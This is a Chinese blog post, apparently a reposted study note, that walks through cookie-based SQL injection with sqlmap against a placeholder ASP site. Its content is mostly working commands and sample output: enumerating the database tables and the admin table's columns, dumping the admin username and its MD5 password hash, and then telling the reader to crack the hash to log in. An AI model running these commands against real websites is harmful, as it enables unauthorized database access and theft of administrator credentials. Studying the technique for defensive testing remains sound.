博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
3.羽翼sqlmap学习笔记之Cookie注入
阅读量:6117 次
发布时间:2019-06-21

本文共 1065 字,大约阅读时间需要 3 分钟。

Cookie注入:

1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.
2.sqlmap命令提示符下输入下列内容进行跑表。

sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2

   假设返回内容如下,说明是access数据库。

-------------------------      [INFO] resuming back-end DBMS 'microsoft access'   ------------------------- 

   设置线程数:10 

   假设返回结果:

-------------------------------------------[ 4 tables]+----------------------+       admin       mark       province       vote+----------------------+

   找到四个表分别为:admin mark province vote

3.猜表的字段名:

sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --columns -T admin --level 2

     假设找到admin表的字段如下:                   

                            id username password 

---------------------------------  [INFO] retrieved:       id  [INFO] retrieved:       username  [INFO] retrieved:       password----------------------------------

4.猜测字段的内容:

sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --dump -T admin -C "username,password" --level 2   

  获取结果:

[INFO] retrieved:       1  [INFO] retrieved:       admin  [INFO] retrieved:       21232f297a57a5a743894a0e4a801fc3  (32位MD5加密密文)

  账号:admin 密码:将密文解密即可。

转载地址:http://vqpka.baihongyu.com/

你可能感兴趣的文章
Oracle中drop user和drop user cascade的区别
查看>>
【Linux】linux经常使用基本命令
查看>>
Java 内存区域和GC机制
查看>>
更新代码和工具,组织起来,提供所有博文(C++,2014.09)
查看>>
HTML模块化:使用HTML5 Boilerplate模板
查看>>
登记申请汇总
查看>>
Google最新截屏案例详解
查看>>
2015第31周一
查看>>
2015第31周日
查看>>
在使用EF开发时候,遇到 using 语句中使用的类型必须可隐式转换为“System.IDisposable“ 这个问题。...
查看>>
PHP使用DES进行加密和解密
查看>>
Oracle 如何提交手册Cluster Table事务
查看>>
BeagleBone Black第八课板:建立Eclipse编程环境
查看>>
在服务器上用Fiddler抓取HTTPS流量
查看>>
文件类似的推理 -- 超级本征值(super feature)
查看>>
【XCode7+iOS9】http网路连接请求、MKPinAnnotationView自定义图片和BitCode相关错误--备用...
查看>>
各大公司容器云的技术栈对比
查看>>
记一次eclipse无法启动的排查过程
查看>>
【转】jmeter 进行java request测试
查看>>
读书笔记--MapReduce 适用场景 及 常见应用
查看>>